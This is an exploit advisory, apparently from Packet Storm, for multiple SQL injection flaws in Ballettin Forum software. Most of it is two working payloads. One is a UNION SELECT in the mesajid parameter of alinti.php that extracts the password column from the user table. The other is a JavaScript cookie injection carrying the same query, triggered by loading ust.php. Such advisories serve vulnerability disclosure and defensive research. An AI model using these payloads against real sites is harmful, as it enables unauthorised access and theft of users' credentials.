Ballettin Forum suffers from multiple remote SQL injection vulnerabilities.
f03d45799067236e31f36dd25387a83d8965b28786b1e5b55b2a18aab9b3912b====================================================================
# Exploit Title: Ballettin Forum Multiple SQL Injection Vulnerability
# Date: 25/07/2010
# Author: 3v0 aka evolution <evolution ^ darkedition.com>
# Software Link: https://www.ballettin.com
# Tested on: Windows Xp Pack 3
====================================================================
#1 - Vulnerable File
------------------------------------------------------
[+] File: https://www.site.com/alinti.php?mesajid=[SQL]
[+] Exploit: https://www.site.com/alinti.php?mesajid=-6666+UNION+SELECT+sifre+FROM+uyeler+WHERE+id=1
#2 - Insecure Cookie
------------------------------------------------------
javascript:document.cookie="ballettin=-6666 UNION SELECT * FROM uyeler WHERE id=1";
After go to https://www.site.com/ust.php
====================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed